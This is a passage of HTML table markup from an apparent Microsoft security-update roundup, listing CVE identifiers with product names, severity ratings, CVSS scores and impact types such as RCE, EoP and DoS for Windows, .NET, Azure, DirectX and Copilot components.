  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50680"><span>CVE-2026-50680</span></a></td>
  <td width="256" class="xl74">Windows Hyper-V
  Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50327"><span>CVE-2026-50327</span></a></td>
  <td width="256" class="xl74">Windows Media Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58542"><span>CVE-2026-58542</span></a></td>
  <td width="256" class="xl74">Windows Media Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58608"><span>CVE-2026-58608</span></a></td>
  <td width="256" class="xl74">Windows Print Spooler
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54982"><span>CVE-2026-54982</span></a></td>
  <td width="256" class="xl74">Windows Reliable
  Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54995"><span>CVE-2026-54995</span></a></td>
  <td width="256" class="xl74">Windows Reliable
  Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42982"><span>CVE-2026-42982</span></a></td>
  <td width="256" class="xl74">Windows Secure Kernel
  Mode Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50392"><span>CVE-2026-50392</span></a></td>
  <td width="256" class="xl74">Windows Secure Kernel
  Mode Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50694"><span>CVE-2026-50694</span></a></td>
  <td width="256" class="xl74">Windows Secure Socket
  Tunneling Protocol (SSTP) Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56188"><span>CVE-2026-56188</span></a></td>
  <td width="256" class="xl74">Windows Server Network
  driver Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50444"><span>CVE-2026-50444</span></a></td>
  <td width="256" class="xl74">Windows Server Update
  Service (WSUS) Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54999"><span>CVE-2026-54999</span></a></td>
  <td width="256" class="xl74">Windows TCP/IP Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47302"><span>CVE-2026-47302</span></a></td>
  <td width="256" class="xl74">.NET Denial of Service
  Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50525"><span>CVE-2026-50525</span></a></td>
  <td width="256" class="xl74">.NET Denial of Service
  Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50651"><span>CVE-2026-50651</span></a></td>
  <td width="256" class="xl74">.NET Denial of Service
  Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57108"><span>CVE-2026-57108</span></a></td>
  <td width="256" class="xl74">.NET Denial of Service
  Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50524"><span>CVE-2026-50524</span></a></td>
  <td width="256" class="xl74">.NET Framework Denial
  of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50527"><span>CVE-2026-50527</span></a></td>
  <td width="256" class="xl74">.NET Framework Denial
  of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50648"><span>CVE-2026-50648</span></a></td>
  <td width="256" class="xl74">.NET Framework Denial
  of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50650"><span>CVE-2026-50650</span></a></td>
  <td width="256" class="xl74">.NET Framework
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50646"><span>CVE-2026-50646</span></a></td>
  <td width="256" class="xl74">.NET Framework Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50649"><span>CVE-2026-50649</span></a></td>
  <td width="256" class="xl74">.NET Remote Code
  Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47304"><span>CVE-2026-47304</span></a></td>
  <td width="256" class="xl74">.NET Security Feature
  Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50528"><span>CVE-2026-50528</span></a></td>
  <td width="256" class="xl74">.NET Security Feature
  Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50659"><span>CVE-2026-50659</span></a></td>
  <td width="256" class="xl74">.NET Spoofing
  Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50526"><span>CVE-2026-50526</span></a></td>
  <td width="256" class="xl74">.NET Tampering
  Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Tampering</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50682"><span>CVE-2026-50682</span></a></td>
  <td width="256" class="xl74">Active Directory
  Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55001"><span>CVE-2026-55001</span></a></td>
  <td width="256" class="xl74">Active Directory
  Domain Services Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50647"><span>CVE-2026-50647</span></a></td>
  <td width="256" class="xl74">Active Directory
  Federation Server Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50684"><span>CVE-2026-50684</span></a></td>
  <td width="256" class="xl74">Active Directory
  Federation Server Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56170"><span>CVE-2026-56170</span></a></td>
  <td width="256" class="xl74">ASP.NET Core Denial of
  Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47300"><span>CVE-2026-47300</span></a></td>
  <td width="256" class="xl74">ASP.NET Core Elevation
  of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47303"><span>CVE-2026-47303</span></a></td>
  <td width="256" class="xl74">ASP.NET Core Elevation
  of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50652"><span>CVE-2026-50652</span></a></td>
  <td width="256" class="xl74">Azure Active Directory
  Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50653"><span>CVE-2026-50653</span></a></td>
  <td width="256" class="xl74">Azure Active Directory
  Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57969"><span>CVE-2026-57969</span></a></td>
  <td width="256" class="xl74">Azure CycleCloud
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58279"><span>CVE-2026-58279</span></a></td>
  <td width="256" class="xl74">Azure CycleCloud
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47632"><span>CVE-2026-47632</span></a></td>
  <td width="256" class="xl74">Azure Monitor Agent
  Metrics Extension Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50338"><span>CVE-2026-50338</span></a></td>
  <td width="256" class="xl74">Azure Spring Apps
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50488"><span>CVE-2026-50488</span></a></td>
  <td width="256" class="xl74">Clipboard User Service
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50491"><span>CVE-2026-50491</span></a></td>
  <td width="256" class="xl74">Code Integrity DLL
  (ci.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50381"><span>CVE-2026-50381</span></a></td>
  <td width="256" class="xl74">Composite Image File
  System driver (cimfs.sys) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50427"><span>CVE-2026-50427</span></a></td>
  <td width="256" class="xl74">Content Delivery
  Manager Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50692"><span>CVE-2026-50692</span></a></td>
  <td width="256" class="xl74">Desktop Window Manager
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58633"><span>CVE-2026-58633</span></a></td>
  <td width="256" class="xl74">Desktop Window Manager
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58634"><span>CVE-2026-58634</span></a></td>
  <td width="256" class="xl74">Desktop Window Manager
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50296"><span>CVE-2026-50296</span></a></td>
  <td width="256" class="xl74">DirectX Graphics
  Kernel Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50375"><span>CVE-2026-50375</span></a></td>
  <td width="256" class="xl74">DirectX Graphics
  Kernel Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50353"><span>CVE-2026-50353</span></a></td>
  <td width="256" class="xl74">DirectX Graphics
  Kernel Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50493"><span>CVE-2026-50493</span></a></td>
  <td width="256" class="xl74">DirectX Graphics
  Kernel Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56643"><span>CVE-2026-56643</span></a></td>
  <td width="256" class="xl74">DirectX Graphics
  Kernel Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56644"><span>CVE-2026-56644</span></a></td>
  <td width="256" class="xl74">DirectX Graphics
  Kernel Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58629"><span>CVE-2026-58629</span></a></td>
  <td width="256" class="xl74">DirectX Graphics
  Kernel Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49174"><span>CVE-2026-49174</span></a></td>
  <td width="256" class="xl74">DNS Client Tampering
  Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Tampering</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50495"><span>CVE-2026-50495</span></a></td>
  <td width="256" class="xl74">DNS Client Tampering
  Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Tampering</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57088"><span>CVE-2026-57088</span></a></td>
  <td width="256" class="xl74">Extensible Storage
  Engine (ESENT) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50663"><span>CVE-2026-50663</span></a></td>
  <td width="256" class="xl74">Game: Age of Empires
  II: Definitive Edition Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="72">
  <td class="xl67" height="72"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47282"><span>CVE-2026-47282</span></a></td>
  <td width="256" class="xl74">GitHub Copilot and
  Visual Studio Code Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41109"><span>CVE-2026-41109</span></a></td>
  <td width="256" class="xl74">GitHub Copilot and
  Visual Studio Code Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50510"><span>CVE-2026-50510</span></a></td>
  <td width="256" class="xl74">GitHub Copilot Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49787"><span>CVE-2026-49787</span></a></td>
  <td width="256" class="xl74">HTTP.sys Denial of
  Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50420"><span>CVE-2026-50420</span></a></td>
  <td width="256" class="xl74">HTTP.sys Information
  Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49788"><span>CVE-2026-49788</span></a></td>
  <td width="256" class="xl74">HTTP/2 Denial of
  Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50696"><span>CVE-2026-50696</span></a></td>
  <td width="256" class="xl74">Internet Key Exchange
  (IKE) Protocol Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58617"><span>CVE-2026-58617</span></a></td>
  <td width="256" class="xl74">M365 Copilot for iOS
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58595"><span>CVE-2026-58595</span></a></td>
  <td width="256" class="xl74">Microsoft Bing App for
  IOS Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49162"><span>CVE-2026-49162</span></a></td>
  <td width="256" class="xl74">Microsoft Brokering
  File System Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50305"><span>CVE-2026-50305</span></a></td>
  <td width="256" class="xl74">Microsoft Brokering
  File System Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50361"><span>CVE-2026-50361</span></a></td>
  <td width="256" class="xl74">Microsoft Brokering
  File System Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50466"><span>CVE-2026-50466</span></a></td>
  <td width="256" class="xl74">Microsoft Brokering
  File System Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50458"><span>CVE-2026-50458</span></a></td>
  <td width="256" class="xl74">Microsoft Brokering
  File System Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="72">
  <td class="xl67" height="72"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50658"><span>CVE-2026-50658</span></a></td>
  <td width="256" class="xl74">Microsoft Defender for
  Endpoint for Mac Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="72">
  <td class="xl67" height="72"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56178"><span>CVE-2026-56178</span></a></td>
  <td width="256" class="xl74">Microsoft Defender for
  Endpoint for Mac Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50657"><span>CVE-2026-50657</span></a></td>
  <td width="256" class="xl74">Microsoft Defender for
